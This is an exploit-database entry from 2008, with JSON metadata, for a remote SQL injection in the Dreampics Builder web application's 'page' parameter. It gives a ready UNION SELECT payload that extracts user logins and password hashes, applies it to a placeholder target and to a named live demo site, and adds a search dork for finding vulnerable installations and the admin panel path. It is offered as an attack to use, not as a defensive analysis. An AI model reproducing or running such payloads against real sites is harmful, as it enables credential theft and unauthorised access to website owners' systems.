ID 1337DAY-ID-3377
Type zdt
Reporter Hussin X
Modified 2008-07-09T00:00:00
Description
Exploit for unknown platform in category web applications
===========================================================
Dreampics Builder (page) Remote SQL Injection Vulnerability
===========================================================
#########################################################
#
# PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
#=========================================================
#
# script : http://www.dreamlevels.com/dreampics.php
#
# DorK : powered by Dreampics Builder
#
##########################################################
Exploit:
www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
L!VE DEMO:
http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
Admin Login :
/admin/
# 0day.today [2017-12-31] #
{"published": "2008-07-09T00:00:00", "id": "1337DAY-ID-3377", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2017-12-31T21:12:37", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220171160"]}, {"type": "threatpost", "idList": ["THREATPOST:85363E24CAB31CC66B298BC023E9CF95"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2019-0641.NASL", "REDHAT-RHSA-2017-2585.NASL", "VIRTUOZZO_VZA-2018-072.NASL", "REDHAT-RHSA-2017-2869.NASL", "REDHAT-RHSA-2017-2770.NASL", "NEWSTART_CGSL_NS-SA-2019-0018_KERNEL-RT.NASL", "CENTOS_RHSA-2017-2473.NASL", "EULEROS_SA-2017-1160.NASL"]}, {"type": "redhat", "idList": ["RHSA-2019:0641", "RHSA-2017:2770", "RHSA-2017:2585", "RHSA-2017:2869"]}, {"type": "virtuozzo", "idList": ["VZA-2018-072"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16"]}, {"type": "zdt", "idList": ["1337DAY-ID-30013"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:7E4B21925D392950552D213FE7157C98"]}, {"type": "exploitdb", "idList": ["EDB-ID:44302"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:4DDC563CC4B682CD1D8A3F51374BC77A"]}], "modified": "2017-12-31T21:12:37", "rev": 2}, "vulnersScore": 0.9}, "type": "zdt", "lastseen": "2017-12-31T21:12:37", "edition": 2, "title": "Dreampics Builder (page) Remote SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3377", "modified": "2008-07-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/3377", "references": [], "reporter": "Hussin X", "sourceData": "===========================================================\r\nDreampics Builder (page) Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n#########################################################\r\n#\r\n# PICS BUILDER (page) SQL Injection Vulnerability\r\n#========================================================\r\n# Author: Hussin X =\r\n# =\r\n#========================================================= \r\n#\r\n# script : http://www.dreamlevels.com/dreampics.php\r\n#\r\n# DorK : powered by Dreampics Builder\r\n# \r\n##########################################################\r\n\r\nExploit: \r\n\r\nwww.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nL!VE DEMO:\r\n\r\nhttp://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nAdmin Login :\r\n\r\n/admin/\r\n\r\n\r\n\n# 0day.today [2017-12-31] #"}
{}
